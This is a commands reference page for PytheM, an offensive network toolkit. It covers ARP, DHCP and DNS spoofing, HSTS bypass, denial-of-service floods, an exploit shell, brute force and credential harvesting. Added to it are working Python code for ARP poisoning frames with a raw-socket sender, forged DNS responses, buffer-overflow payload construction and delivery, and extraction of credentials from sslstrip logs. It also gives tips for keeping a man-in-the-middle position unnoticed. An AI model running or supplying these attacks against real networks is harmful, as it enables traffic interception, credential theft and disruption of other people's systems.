
Commands Reference

m4n3dw0lf edited this page Nov 28, 2016 · 83 revisions

SECTION - CORE

  • help: Print the help message.

  • exit/quit: Leave the program.

  • set: Set a variable's value.

arguments:

  • interface
  • gateway
  • target
  • file
  • arpmode
  • domain
  • redirect
  • script
  • filter

examples:

   pythem> set interface
   [+] Enter the interface:
             or
   pythem> set interface wlan0
  • print: Print a variable's value.

    examples:

   pythem> print gateway

SECTION - NETWORK, MAN-IN-THE-MIDDLE AND DENIAL OF SERVICE (DOS)

  • scan: Run a TCP scan (a fixed list of significant ports), a manual scan (ports you specify) or an ARP scan (layer 2 host discovery).

Should be called after setting interface and target.

Targets can be IP addresses or network ranges in CIDR notation.

arguments:

  • tcp
  • arp
  • manual

examples:

   pythem> scan
   [*] Select one scan mode, options = tcp/arp/manual
   [+] Scan mode: arp
	   or
   pythem> scan tcp

   pythem> scan manual
   [+] Enter the port, ports (separated by commas): 21,22,25,80
  • arpspoof: Start or stop an ARP spoofing attack.

Optionally set arpmode to choose the ARP spoofing mode: rep spoofs ARP replies, req spoofs ARP requests.

arguments:

  • start
  • stop
  • status
  • help

examples:

   pythem> arpspoof start
   pythem> arpspoof stop
   pythem> arpspoof status
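What the two arpmode settings put on the wire, as an added example that is not PytheM's arpspoof code: it builds the ARP reply (rep) and ARP request (req) frames a bidirectional spoof sends to the target and to the gateway each round, and the frames that hand the real MAC addresses back when the attack is stopped. The MAC and IP addresses are constructed lab values; send_frames is an assumption about delivery (a Linux AF_PACKET raw socket, which needs root) and is not called by the demo.

```python
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
ZERO_MAC = "00:00:00:00:00:00"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def build_arp_frame(opcode, sender_mac, sender_ip, target_mac, target_ip, dst_mac):
    """Ethernet II header + ARP body (hw=Ethernet, proto=IPv4): 14 + 28 = 42 bytes."""
    eth = mac_bytes(dst_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Decode the ARP fields of a frame, to check what would be sent."""
    return {
        "opcode": struct.unpack("!H", frame[20:22])[0],
        "sender_mac": ":".join(f"{b:02x}" for b in frame[22:28]),
        "sender_ip": ".".join(str(b) for b in frame[28:32]),
        "target_mac": ":".join(f"{b:02x}" for b in frame[32:38]),
        "target_ip": ".".join(str(b) for b in frame[38:42]),
    }


def spoof_frames(mode, attacker_mac, target_mac, target_ip, gateway_mac, gateway_ip):
    """One round of a bidirectional spoof: a frame for the target and one for the gateway.

    rep: unsolicited replies, "gateway_ip is-at attacker_mac" to the target and
         "target_ip is-at attacker_mac" to the gateway.
    req: requests whose sender fields carry the same lie; stacks that ignore
         unsolicited replies usually still cache the sender of a request.
    """
    if mode == "rep":
        to_target = build_arp_frame(ARP_REPLY, attacker_mac, gateway_ip, target_mac, target_ip, target_mac)
        to_gateway = build_arp_frame(ARP_REPLY, attacker_mac, target_ip, gateway_mac, gateway_ip, gateway_mac)
    elif mode == "req":
        to_target = build_arp_frame(ARP_REQUEST, attacker_mac, gateway_ip, ZERO_MAC, target_ip, target_mac)
        to_gateway = build_arp_frame(ARP_REQUEST, attacker_mac, target_ip, ZERO_MAC, gateway_ip, gateway_mac)
    else:
        raise ValueError("arpmode must be 'rep' or 'req'")
    return to_target, to_gateway


def restore_frames(target_mac, target_ip, gateway_mac, gateway_ip):
    """Frames to send on stop: replies carrying the real MACs so both caches heal."""
    to_target = build_arp_frame(ARP_REPLY, gateway_mac, gateway_ip, target_mac, target_ip, target_mac)
    to_gateway = build_arp_frame(ARP_REPLY, target_mac, target_ip, gateway_mac, gateway_ip, gateway_mac)
    return to_target, to_gateway


def send_frames(interface, frames):
    """Raw layer 2 send on Linux (needs root). Not called by the demo below."""
    import socket
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as sock:
        sock.bind((interface, 0))
        for frame in frames:
            sock.send(frame)


if __name__ == "__main__":
    # Constructed lab addresses: attacker, target and gateway.
    to_target, to_gateway = spoof_frames("rep", "aa:bb:cc:dd:ee:01",
                                         "aa:bb:cc:dd:ee:02", "10.0.1.5",
                                         "aa:bb:cc:dd:ee:03", "10.0.1.1")
    print(parse_arp(to_target))
    print(parse_arp(to_gateway))
```

If you drive this by hand instead of through PytheM, enable IP forwarding on the attacker host (net.ipv4.ip_forward=1) before poisoning, or the target loses connectivity and the man-in-the-middle position is obvious; and send the restore frames on stop, since a poisoned cache otherwise stays wrong until it times out.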

  • dhcpspoof: Start a DHCP ACK injection spoofing attack.

If the real DHCP server's ACK reaches the client before yours, the spoofing will not work; use the sniffer to check which ACK arrived first.

arguments:

  • start
  • stop
  • status
  • help

example:

   pythem> dhcpspoof start
  • dnsspoof: Start a DNS spoofing attack.

Should be called after an ARP spoofing attack has been started.

arguments:

  • start
  • stop
  • status
  • help

examples:

   pythem> dnsspoof start
   pythem> dnsspoof stop
   pythem> dnsspoof status
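How a spoofer answers a DNS query it sees on the poisoned path, as an added example that is not PytheM's dnsspoof code: it parses the client's query and, for names in a spoof table, forges a response that reuses the client's transaction ID, copies the question byte for byte and carries a single A record; anything else returns None so the real answer is left alone. The name, the IP and the table are constructed; delivering the forged packet with the resolver's source IP (raw socket or scapy) is left out.

```python
import struct


def encode_name(name):
    out = b"".join(bytes([len(label)]) + label.encode() for label in name.rstrip(".").split("."))
    return out + b"\x00"


def decode_name(data, offset):
    """Return (name, offset after the name); follows RFC 1035 compression pointers."""
    labels = []
    while True:
        length = data[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if (length & 0xC0) == 0xC0:
            pointer = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            labels.append(decode_name(data, pointer)[0])
            return ".".join(labels), offset + 2
        labels.append(data[offset + 1:offset + 1 + length].decode())
        offset += 1 + length


def build_query(txid, name, qtype=1):
    """A standard recursive query for name (qtype 1 = A), as a client sends it."""
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", qtype, 1)


def spoof_response(query, spoof_table, ttl=300):
    """Forge the answer for an A/IN query whose name is in spoof_table; None = let the real answer through."""
    txid, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", query[:12])
    if flags & 0x8000 or qdcount != 1:
        return None                      # a response, or not a simple query
    name, off = decode_name(query, 12)
    qtype, qclass = struct.unpack("!HH", query[off:off + 4])
    if (qtype, qclass) != (1, 1):
        return None                      # only A/IN is spoofed here
    answer_ip = spoof_table.get(name.lower())
    if answer_ip is None:
        return None
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR=1, RD=1, RA=1, one answer
    question = query[12:off + 4]                                # copied verbatim
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4)        # name = pointer to the question
    return header + question + answer + bytes(int(o) for o in answer_ip.split("."))


def parse_answers(response):
    """(txid, [(name, ip), ...]) for the A records of a response; used to check what would be sent."""
    txid, _, _, ancount, _, _ = struct.unpack("!HHHHHH", response[:12])
    _, off = decode_name(response, 12)
    off += 4
    answers = []
    for _ in range(ancount):
        rname, off = decode_name(response, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", response[off:off + 10])
        off += 10
        if rtype == 1:
            answers.append((rname, ".".join(str(b) for b in response[off:off + rdlen])))
        off += rdlen
    return txid, answers


if __name__ == "__main__":
    table = {"www.example.com": "10.0.1.5"}     # constructed: victim name -> attacker IP
    query = build_query(0x1337, "www.example.com")
    print(parse_answers(spoof_response(query, table)))
```

The forged reply only counts if it reaches the client before the real resolver's, which is why this sits on top of the ARP spoof: the same position that lets you see the query also lets you delay or drop the genuine answer instead of racing it.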

  • hstsbypass: Start sslstrip+ and dns2proxy

SSLstrip+ by: LeonardoNve && M.Marlinspike

DNS2Proxy by: LeonardoNve

Should be called after an ARP spoofing attack has been started

example:

   pythem> arpspoof start
   pythem> hstsbypass
  • bdfproxy: Start BDFProxy and Metasploit combo.

BDFProxy by: JoshuaPitts

Metasploit by: Rapid7

Should be called after an ARP spoofing attack has been started

example:

   pythem> arpspoof start
   pythem> bdfproxy
  • inject: Start a web server that serves the script to be injected (the script variable of set).

Should be called after an ARP spoofing attack has been started.

arguments:

  • start
  • stop
  • status
  • help

examples:

   pythem> inject start
   pythem> inject stop
  • sniff: Start sniffing packets.

Should be called after setting an interface

sniff custom filters:

  • http
  • dns
  • core | You need to try this!

Every filter, and no filter at all, is passed through the PytheM custom filter to reduce redundant output.

examples:

   pythem> sniff http
	  or
   pythem> sniff
   [+] Enter the filter: port 1337 and host 10.0.1.5  (tcpdump-like format)
  • dos: Start a Denial of Service (DoS) attack.

arguments:

  • dnsdrop > Drop DNS queries that pass through the man-in-the-middle traffic.

ARP spoofing needs to be running so that the traffic of the target IP address or range passes through this host.

  • synflood > Start a SYN flood attack on the target host; default port = 80, set port to change it.
  • udpflood > Start a UDP flood attack on the target host; default port = 80, set port to change it.
  • teardrop > Start a UDP teardrop fragmentation attack.
  • land > Start a LAND attack on the target address; default port = 80, set port to change it.
  • icmpflood > Start an ICMP flood attack on the target host.
  • pingofdeath > Start a ping of death (P.O.D.) attack on the target address.
  • icmpsmurf > Start an ICMP smurf attack on the target host: sends echo requests with the target address as source.
  • dhcpstarvation > Start a DHCP starvation attack on the network's DHCP server: many DHCP discovers with spoofed MAC addresses.
  • dnsamplification > Start a DNS amplification attack on the target address, using the given DNS servers as amplifiers.

examples:

   pythem> dos dnsdrop help

   pythem> dos synflood
  • pforensic: Start a packet analyzer.

Should be called after setting file to a .pcap file.

examples:

   pythem> pforensic
   pforensic> help

PFORENSIC COMMANDS REFERENCE

  • help: Print the help message

  • clear: Clean the screen, same as GNU/Linux OS "clear"

  • exit/quit: Return to pythem

  • show: Display all the packets and their index numbers.

  • conversations: Display a pictogram of the conversations between hosts in the analyzed file.

  • packetdisplay [num]: Display the full content of the packet with the given index.

  • filter [string/layer]: Run a custom filter over the packets.
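A small version of what the show, conversations and filter commands do, as an added example that is not taken from PytheM's pforensic: a reader for the classic pcap format (pcapng is not handled) with an Ethernet/IPv4/TCP/UDP decoder, a per-host-pair conversation counter and a filter by layer name or IP address. SAMPLE_PCAP is constructed inline from three frames whose IP and TCP checksums are left at zero, since the reader does not verify them.

```python
import struct

PCAP_MAGIC = 0xA1B2C3D4


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def parse_packet(raw):
    """Ethernet -> IPv4 -> TCP/UDP decode; the 'layers' list doubles as the filter vocabulary."""
    pkt = {"len": len(raw), "layers": ["ether"]}
    if len(raw) < 14:
        return pkt
    pkt["dst_mac"], pkt["src_mac"] = mac_str(raw[:6]), mac_str(raw[6:12])
    ethertype = struct.unpack("!H", raw[12:14])[0]
    if ethertype == 0x0806:
        pkt["layers"].append("arp")
        return pkt
    if ethertype != 0x0800 or len(raw) < 34:
        return pkt
    ihl, proto = (raw[14] & 0x0F) * 4, raw[23]
    pkt["layers"].append("ip")
    pkt["src"], pkt["dst"] = ip_str(raw[26:30]), ip_str(raw[30:34])
    l4 = 14 + ihl
    if proto == 6 and len(raw) >= l4 + 20:
        pkt["layers"].append("tcp")
        pkt["sport"], pkt["dport"] = struct.unpack("!HH", raw[l4:l4 + 4])
        pkt["payload"] = raw[l4 + (raw[l4 + 12] >> 4) * 4:]   # data offset skips TCP options
    elif proto == 17 and len(raw) >= l4 + 8:
        pkt["layers"].append("udp")
        pkt["sport"], pkt["dport"] = struct.unpack("!HH", raw[l4:l4 + 4])
        pkt["payload"] = raw[l4 + 8:]
    ports = (pkt.get("sport"), pkt.get("dport"))
    if 53 in ports:
        pkt["layers"].append("dns")
    elif 80 in ports:
        pkt["layers"].append("http")
    return pkt


def load_pcap(data):
    """Classic pcap only: 24-byte global header, then a 16-byte record header per packet."""
    if struct.unpack("<I", data[:4])[0] == PCAP_MAGIC:
        endian = "<"
    elif struct.unpack(">I", data[:4])[0] == PCAP_MAGIC:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    packets, off = [], 24
    while off + 16 <= len(data):
        _ts_sec, _ts_usec, incl_len, _orig_len = struct.unpack(endian + "IIII", data[off:off + 16])
        off += 16
        pkt = parse_packet(data[off:off + incl_len])
        pkt["index"] = len(packets)
        packets.append(pkt)
        off += incl_len
    return packets


def show(packets):
    """'show': one summary line per packet, with its index number."""
    return [f"[{p['index']}] {p.get('src', '?')}:{p.get('sport', '')} -> {p.get('dst', '?')}:"
            f"{p.get('dport', '')} {'/'.join(p['layers'])} {p['len']}B" for p in packets]


def conversations(packets):
    """'conversations': packet counts per unordered pair of IP hosts."""
    convs = {}
    for p in packets:
        if "ip" in p["layers"]:
            key = tuple(sorted((p["src"], p["dst"])))
            convs[key] = convs.get(key, 0) + 1
    return convs


def filter_packets(packets, expr):
    """'filter': a layer name (ether, arp, ip, tcp, udp, dns, http) or an IP address."""
    return [p for p in packets if expr in p["layers"] or expr in (p.get("src"), p.get("dst"))]


# --- constructed sample capture, not a real trace ----------------------------
def frame(src, dst, proto, l4):
    eth = bytes.fromhex("aabbcc000002aabbcc000001") + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0, 64, proto, 0, ip_bytes(src), ip_bytes(dst))
    return eth + ip + l4   # IP checksum field is 0: the reader above never checks it


def udp(sport, dport, payload):
    return struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload


def tcp(sport, dport, payload):
    return struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload


def make_pcap(frames):
    data = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1)   # linktype 1 = Ethernet
    for i, f in enumerate(frames):
        data += struct.pack("<IIII", 1480000000 + i, 0, len(f), len(f)) + f
    return data


SAMPLE_PCAP = make_pcap([
    frame("10.0.1.5", "10.0.1.1", 17, udp(5353, 53, b"\x13\x37\x01\x00")),
    frame("10.0.1.1", "10.0.1.5", 17, udp(53, 5353, b"\x13\x37\x81\x80")),
    frame("10.0.1.5", "192.0.2.10", 6, tcp(40000, 80, b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n")),
])

if __name__ == "__main__":
    pkts = load_pcap(SAMPLE_PCAP)
    print("\n".join(show(pkts)))
    for (a, b), n in conversations(pkts).items():
        print(f"{a} <--> {b}: {n} packets")
```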

SECTION - EXPLOIT DEVELOPMENT AND REVERSE ENGINEERING

  • xploit: Interactive stdin or TCP exploit development shell.

The stdin argument should be used after setting file.

The tcp argument should be used after setting target.

arguments:

  • stdin
  • tcp

examples:

   pythem> set file ./exec

   pythem> xploit stdin
           or
   pythem> xploit
   [*] Select one xploit mode, options = stdin/tcp
   [+] Exploit mode:

   xploit> help

XPLOIT COMMANDS REFERENCE

  • help: Print this help message.

  • clear: Clean the screen, same as GNU/Linux OS "clear".

  • exit/quit: Return to pythem.

  • set: Set variable values.

parameters:

  • offset > Number of 'A's needed to overwrite the instruction pointer.

  • addr1 > (Optional) Hex address (0xaddress) written right after the offset.

  • addr2 > (Optional) Hex address (0xaddress) written after addr1.

  • nops > (Optional) Number of NOPs after the IP overwrite, or after addr1 and addr2 if they are set.

  • shellcode > (Optional) Shellcode (generated by msfvenom or any other tool).

  • lenght > Total length of the payload.

  • arch > Target system processor architecture.

  • print: Print a variable's value.

    example:

   xploit> print offset
  • decode/encode: Decode or encode a string with a chosen encoding.

    examples:

   xploit> decode hex
   xploit> encode hex
  • search: Search for instructions or an opcode sequence in the binary executable.

parameters:

  • instructions

  • opcode

examples:

   xploit> search
   [+] Search (instructions/opcode):
                 or
   xploit> search instructions
   [+] Find: pop ?di
   (wildcards for instruction search: ? - any character, % - any character)

   xploit> search opcode
   [+] Find: ffe4
  • xploit: Run the exploit with the current settings.

    example:

   xploit> xploit
  • fuzz: Start fuzzing the subject.

If file was set, xploit fuzzes stdin; if target was set, it fuzzes TCP.

The offset value is the number of 'A's sent first and the step by which the count grows: with the default offset = 1 the input grows 1, 2, 3, ...; with offset = 10 it grows 10, 20, 30, ...

examples:

   xploit> fuzz

Any other input is run in a GNU Debugger (gdb) shell with the target file.
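The payload layout described by the set parameters (offset, addr1, addr2, nops, shellcode, lenght, arch), the step behaviour of fuzz and the opcode search, as one added example: this is a reconstruction from the descriptions above, not PytheM's xploit code. The 'C' filler byte, the bad_bytes check and the two deliver_* helpers are assumptions added here; pack_addr assumes little-endian Intel targets.

```python
import socket
import struct
import subprocess

ARCH_FORMATS = {"x86": "<I", "x86_64": "<Q"}   # little-endian, as on Intel targets


def pack_addr(addr, arch):
    return struct.pack(ARCH_FORMATS[arch], addr)


def build_payload(offset, length, arch="x86", addr1=None, addr2=None, nops=0, shellcode=b""):
    """'A' * offset, then addr1/addr2 if set, then a NOP sled, then shellcode, padded to length."""
    payload = b"A" * offset
    for addr in (addr1, addr2):
        if addr is not None:
            payload += pack_addr(addr, arch)
    payload += b"\x90" * nops + shellcode
    if len(payload) > length:
        raise ValueError(f"payload is {len(payload)} bytes, longer than length={length}")
    return payload.ljust(length, b"C")   # 'C' filler is this example's choice, not the tool's


def bad_bytes(payload, badchars=b"\x00\x0a\x0d"):
    """Positions of bytes the target's input path would cut or mangle (NUL for strcpy, newline for fgets)."""
    return [i for i, b in enumerate(payload) if b in badchars]


def find_opcode(binary, opcode_hex):
    """Every file offset of a byte pattern, e.g. 'ffe4' (jmp esp), in a raw executable image."""
    pattern = bytes.fromhex(opcode_hex)
    offsets, start = [], binary.find(pattern)
    while start != -1:
        offsets.append(start)
        start = binary.find(pattern, start + 1)
    return offsets


def fuzz_inputs(step=1, limit=None):
    """The 'A' strings fuzz sends: step, 2*step, 3*step, ... (offset acts as the step)."""
    n = step
    while limit is None or n <= limit:
        yield b"A" * n
        n += step


def deliver_stdin(path, payload, timeout=5):
    """stdin mode: run the file with the payload on stdin; a negative return code is the signal number."""
    proc = subprocess.run([path], input=payload, capture_output=True, timeout=timeout)
    return proc.returncode


def deliver_tcp(host, port, payload, timeout=5):
    """tcp mode: send the payload to the target and return whatever it answers."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(payload)
        try:
            return sock.recv(4096)
        except socket.timeout:
            return b""


if __name__ == "__main__":
    # Constructed values: offset 10, a 32-bit return address, a 4-byte NOP sled and an int3 shellcode.
    p = build_payload(offset=10, length=32, addr1=0x0804ABCD, nops=4, shellcode=b"\xcc\xcc")
    print(p.hex(), bad_bytes(p))
    print(find_opcode(b"\x00\xff\xe4\x00\xff\xe4", "ffe4"))
```

Run bad_bytes on every payload before sending it: a 64-bit address always carries NUL bytes in its upper half, which is exactly the kind of payload a string-based overflow truncates.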

SECTION - BRUTE-FORCE

  • brute: Start a brute-force attack.

Should be called after setting a target and a word-list file path (file).

arguments:

  • ssh > IP address as target
  • url > URL (with http:// or https://) as target
  • form > URL (with http:// or https://) as target

examples:

   pythem> brute form
   pythem> brute ssh

SECTION - UTILS

  • geoip: Approximately geolocate an IP address.

Should be called after setting target to an IP address.

examples:

   pythem> geoip
	  or
   pythem> geoip 8.8.8.8 (without setting target)
  • harvest: Harvest credentials from the file that was set; default file: sslstrip.log.

    example:

   pythem> harvest
  • decode/encode: Decode or encode a string with a chosen encoding.

    examples:

   pythem> decode base64
   [*] String to be decoded:
            or
   pythem> encode hex
   [*] String to be encoded:
  • cookiedecode: Decode a base64, URL-encoded cookie value.

    example:

   pythem> cookiedecode

Any other input is executed in the system shell, e.g. ls, nano, cat.
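Credential harvesting from an sslstrip-style log together with base64url cookie decoding, serving the harvest and cookiedecode entries above, as an added example rather than PytheM's own code. SAMPLE_LOG is constructed in the "POST Data (host):" line-then-body shape sslstrip writes; that shape, and the regex deciding which form fields look like credentials, are assumptions made here.

```python
import base64
import re
from urllib.parse import parse_qs, unquote

CRED_KEYS = re.compile(r"user|uname|login|email|pass|pwd", re.I)   # assumed credential field names
POST_LINE = re.compile(r"POST Data \(([^)]+)\):")


def cookiedecode(value):
    """Decode a URL-encoded, base64url cookie value, restoring any '=' padding the app stripped."""
    raw = unquote(value).replace("-", "+").replace("_", "/")
    raw += "=" * (-len(raw) % 4)
    return base64.b64decode(raw)


def harvest(log_text):
    """Credential-looking fields from each 'POST Data (host):' line and the form body that follows it."""
    creds, host = [], None
    for line in log_text.splitlines():
        m = POST_LINE.search(line)
        if m:
            host = m.group(1)
            continue
        if host is not None and "=" in line:
            fields = {k: v[0] for k, v in parse_qs(line, keep_blank_values=True).items()}
            hits = {k: v for k, v in fields.items() if CRED_KEYS.search(k)}
            if hits:
                creds.append({"host": host, **hits})
            host = None
    return creds


def harvest_file(path="sslstrip.log"):
    with open(path, encoding="utf-8", errors="replace") as f:
        return harvest(f.read())


# Constructed log in the assumed sslstrip shape; not copied from a real capture.
SAMPLE_LOG = """\
2016-11-28 20:15:01,042 SECURE POST Data (www.example.com):
user=alice&pass=s3cr%21t&remember=1
2016-11-28 20:15:07,311 POST Data (shop.example.com):
q=laptop&sort=price
2016-11-28 20:15:09,900 SECURE POST Data (mail.example.com):
login=bob%40example.com&password=hunter2
"""

if __name__ == "__main__":
    for cred in harvest(SAMPLE_LOG):
        print(cred)
    print(cookiedecode("eyJ1c2VyIjoiYWRtaW4ifQ%3D%3D"))
```

cookiedecode accepts both the standard and the URL-safe base64 alphabets and re-adds padding, since web frameworks commonly strip the trailing '=' from cookie values and percent-encode what is left.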
